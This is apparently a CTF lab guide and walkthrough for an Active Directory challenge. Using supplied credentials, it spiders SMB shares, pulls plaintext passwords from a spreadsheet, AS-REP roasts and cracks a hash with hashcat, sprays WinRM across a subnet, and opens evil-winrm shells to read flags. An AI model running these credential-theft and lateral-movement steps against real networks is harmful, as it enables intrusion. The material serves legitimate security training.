Cerberus

Newcomers

Welcome to Active Directory! This page is designed for beginners and those with limited experience in Active Directory environments - including individuals familiar with entry-level certifications like the OSCP. The goal of this page is to break down the learning curve of Active Directory, and hopefully help you get the first flag!

Support

If you've read through this guide, and are facing an issue - feel free to reach out to anyone on the team at the conference!

We have @gatari (Zavier), @Sora (Jun Yu), @Gladiator (Cher Boon)!

Quick Start

You phished a HR of JEZZ COPORATION & have successfully managed to get into their network

The credentials are

A.Granne: Z7pLq9Vp

┌──(kali㉿kali)-[~/Desktop/VPN_Packs]
└─$ nxc smb 10.3.10.10 -u 'A.Granne' -p 'Z7pLq9Vp' --shares -M spider_plus -o DOWNLOAD_FLAG=True 

SMB         10.3.10.10      445    FILE-SRV         [*] Windows Server 2022 Build 20348 x64 (name:FILE-SRV) (domain:JEZZCORP.LOCAL) (signing:False) (SMBv1:False)
SMB         10.3.10.10      445    FILE-SRV         [+] JEZZCORP.LOCAL\A.Granne:Z7pLq9Vp 
SMB         10.3.10.10      445    FILE-SRV         [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*]     STATS_FLAG: True
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*]  OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB         10.3.10.10      445    FILE-SRV         [*] Enumerated shares
SMB         10.3.10.10      445    FILE-SRV         Share           Permissions     Remark
SMB         10.3.10.10      445    FILE-SRV         -----           -----------     ------
SMB         10.3.10.10      445    FILE-SRV         ADMIN$                          Remote Admin
SMB         10.3.10.10      445    FILE-SRV         C$                              Default share
SMB         10.3.10.10      445    FILE-SRV         IPC$            READ            Remote IPC
SMB         10.3.10.10      445    FILE-SRV         Onboarding      READ            Onboarding
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/10.3.10.10.json".
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*] SMB Shares:           4 (ADMIN$, C$, IPC$, Onboarding)
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*] SMB Readable Shares:  2 (IPC$, Onboarding)
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*] Total folders found:  0
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*] Total files found:    1
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*] File size average:    8.45 KB
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*] File size min:        8.45 KB
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*] File size max:        8.45 KB
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*] File unique exts:     1 (xlsx)
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [*] Downloads successful: 1
SPIDER_PLUS 10.3.10.10      445    FILE-SRV         [+] All files processed successfully

find the excel file

|Full Name|UPN|Password|Intern Period|School|
|Barbe Johnson|[email protected]|fQ2Hd8Ak|Jan 2026 - Jun 2026|Nanyang Polytechnic|
|Jess Kumar|[email protected]|Z7pLr2Qa|Jan 2026 - Jun 2026|Singapore Polytechnic|
|Kami Yeo|[email protected]|mC84KqRt|Jan 2026 - Jun 2026|Temasek Polytechnic|

Flag 1

┌──(kali㉿kali)-[~/Desktop/VPN_Packs]
└─$ nxc ldap 10.3.10.40 -u 'A.Granne' -p 'Z7pLq9Vp' --asreproast apacoutput.txt           
LDAP        10.3.10.40      389    DC01-SRV         [*] Windows Server 2022 Build 20348 (name:DC01-SRV) (domain:JEZZCORP.LOCAL) (signing:None) (channel binding:No TLS cert) 
LDAP        10.3.10.40      389    DC01-SRV         [+] JEZZCORP.LOCAL\A.Granne:Z7pLq9Vp 
LDAP        10.3.10.40      389    DC01-SRV         [-] Neo4J does not seem to be available on bolt:/127.0.0.1:7687.
LDAP        10.3.10.40      389    DC01-SRV         [*] Total of records returned 1
LDAP        10.3.10.40      389    DC01-SRV         [email protected]:a981fcc8e6ad4e097a370a12c541b4bb$68ca150ca689b438453b5845d839743dd8a45cb6323ec46e4b33038ddb23ffe1d38a85ec437f7e1ae9371bc0a3f3338652a7d59eec1831abf6d1418b3119e15a7829c80ea44d4f93b6f2aff33733193d023b26ba159bfd2af9b7ba1aa926e8bcc033090f9c465301cd55034b99f62f17ae7b786e6f19f172483f7855131d4912e1f48fc5e6249ac28af41cfd2912c074eb16f2165f0c858da81f15c9cc635f13501523c4f9ba566d7743b808f0454e73cf84ed9db4123e1d034d5b698526aaf881de33965762d1a5ff8fbf55aec00ef663fbe26a315f98b29fbdf42f3111e0afd073f05f5a9bf86182394cbaf457421e


┌──(kali㉿kali)-[~/Desktop/ASYNC-Security/YBNCTF2025]
└─$ /home/kali/Desktop/Tools/Bruteforcing/hashcat-6.2.6/hashcat.bin -m18200 apacoutput.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 5 5600 6-Core Processor, 2915/5894 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

[email protected]:12386818a385594bd46eff65059f77f1$830c2d1ad4c06eb3b4f3de52c5e3e1a1dfa1bcb69275756d9d7880deb16a6283a2c469cfb2909d8ec177627a23dcd7ae85e810577caee81c7da16e2df8d0cdb75ac1eb290816189811829ed5273dc4b66900a434de4fccb2450e92053335264bf0dfb3c68e69fd9f3d8152b9810b18312161b175b0cdaccb13b2dd12d06cd519c30cc6e684d7f182de62e04c746feba8ba887ceb5a6d5c9b52ef5a7675cc72c3d94f902c24f657308fcf591d44d05771a5a5d094deb9d6c57e89a6495535860f4d54bb9823af5516c49f3de8b7e843fe3b470e0876b08683b96a143e545520e9f31db30642ab0033ea21598f9bce2225:caitlind22

L.Rodriguez : caitlind22

┌──(kali㉿kali)-[~/Desktop/ASYNC-Security/YBNCTF2025]
└─$ nxc winrm 10.3.10.0/24 -u 'L.Rodriguez' -p 'caitlind22'
WINRM       10.3.10.10      5985   FILE-SRV         [+] JEZZCORP.LOCAL\L.Rodriguez:caitlind22 (Pwn3d!)


┌──(kali㉿kali)-[~/Desktop/ASYNC-Security/YBNCTF2025]
└─$ evil-winrm -i 10.3.10.10 -u 'L.Rodriguez' -p 'caitlind22'     

*Evil-WinRM* PS C:\Users> tree /f
Folder PATH listing for volume Windows 2022
Volume serial number is 20F5-5BE0
C:.
¦   FLAG1.txt
¦
+---Administrator
+---L.Rodriguez
¦   +---Desktop
¦   +---Documents
¦   +---Downloads
¦   +---Favorites
¦   +---Links
¦   +---Music
¦   +---Pictures
¦   +---Saved Games
¦   +---Videos
+---localuser
+---Public
+---rangeadmin
+---rangeuser
*Evil-WinRM* PS C:\Users> cat FLAG1.TXT
9575a78bd3bf38af376a657100dd10c1

FLAG 2

┌──(kali㉿kali)-[~/Desktop/ASYNC-Security/YBNCTF2025]
└─$ nxc winrm 10.3.10.0/24 -u 'B.Johnson' -p 'fQ2Hd8Ak'
WINRM       10.3.10.10      5985   FILE-SRV         [*] Windows Server 2022 Build 20348 (name:FILE-SRV) (domain:JEZZCORP.LOCAL) 
WINRM       10.3.10.20      5985   UAT-SRV          [*] Windows Server 2022 Build 20348 (name:UAT-SRV) (domain:JEZZCORP.LOCAL) 
WINRM       10.3.10.30      5985   MSSQL-SRV        [*] Windows Server 2022 Build 20348 (name:MSSQL-SRV) (domain:JEZZCORP.LOCAL) 
WINRM       10.3.10.10      5985   FILE-SRV         [-] JEZZCORP.LOCAL\B.Johnson:fQ2Hd8Ak
WINRM       10.3.10.20      5985   UAT-SRV          [+] JEZZCORP.LOCAL\B.Johnson:fQ2Hd8Ak (Pwn3d!)

┌──(kali㉿kali)-[~/Desktop/ASYNC-Security/YBNCTF2025]
└─$ evil-winrm -i 10.3.10.20 -u 'B.Johnson' -p 'fQ2Hd8Ak'                             
Evil-WinRM shell v3.5

*Evil-WinRM* PS C:\Users> tree /f
Folder PATH listing for volume Windows 2022
Volume serial number is 20F5-5BE0
C:.
¦   FLAG2.txt
¦
+---Administrator
+---B.Johnson
¦   +---Desktop
¦   +---Documents
¦   +---Downloads
¦   +---Favorites
¦   +---Links
¦   +---Music
¦   +---Pictures
¦   +---Saved Games
¦   +---Videos
+---localuser
+---Public
+---rangeadmin
+---rangeuser
*Evil-WinRM* PS C:\Users> cat FLAG2.txt

1095744decaa363007c1d480b6d22759